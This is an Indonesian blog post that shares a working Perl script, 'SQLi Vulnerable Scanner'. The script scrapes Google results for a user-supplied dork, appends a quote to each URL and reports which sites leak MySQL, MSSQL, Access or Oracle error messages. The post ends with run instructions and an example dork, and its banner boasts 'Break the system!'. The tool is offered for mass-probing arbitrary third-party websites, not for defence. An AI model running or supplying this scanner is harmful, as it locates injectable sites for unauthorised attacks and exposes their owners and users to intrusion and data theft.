yeah, g'd evening
Share tools lagi nih, kemarin gw share tools SQL Injection scanner yg di tuliskan menggunakan bahasa PHP.
Dan sekarang mari kita coba scanner yang lebih keren lagi, scanner ini ditulis menggunakan bahasa Perl (wiw)
Check the source
Jangan lupa save dengan ekstensi .pl (contoh: sql.pl)
#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner .:.
# .:. Version : 3.0 fixed (06/10/2012) .:.
# .:. Author : Metropolis .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection .:.
# .:. MSAccess Injection .:.
# .:. MSSQL Injection .:.
# .:. Oracle Injection .:.
# .:. Blind Injection .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# Useless version :
# http://pastebin.com/kKxCCJuU 1.0
# http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;
getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
$opts{'p'} = 1;
}
print <<"Metropolis_intro";
___________
|.---------.|
|| ||
|| 5c4nn3r || SQL injection attack!
|| || Break the system!
|'---------'|
`)__ ____('
[=== -- o ]
__'---------'__
[::::::::::: :::]
[:::::::::::::::]
Metropolis_intro
system('COLOR A');
print "\n\n";
print "h4x0ring ...\n";
print "--------------------------\n\n";
for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
$t = "http://www.google.co.id/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
{
if($line =~/(.*) class=l/ig)
{
$out = $1;
$out =~ s/"//g;
$out =~s/$/\'/;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/SQL syntax/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
{print "$out Vulnerable MS Access!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
{print "$out Vulnerable MSSQL!\n";}
elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
{print "$out Vulnerable Blind Possible!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out Vulnerable Oracle!\n";}
}
}
}
}
Jangan lupa juga, ente harus udah install perl (kalo OS windows, coba install Active Perl, kalo Linux sih udah ada )
Scannernya ampuh juga kok :)
Buat jalanin programnya
perl namafile.pl -k <dork> -p <page>contoh :
perl sql.pl -k inurl:gallery.php?id= -p 100
Dah dech capek ngetik mulu kapan colinya :D
Ichsan Bahri
I'm Ichsan. A full time web designer. I enjoy to make modern template. I love create blogger template and write about web design, blogger. Now I'm working with Themeforest. You can buy our templates from Themeforest.
Website: http://sagoe.net/
No Comment to " SQL Injection Scanner [perl] "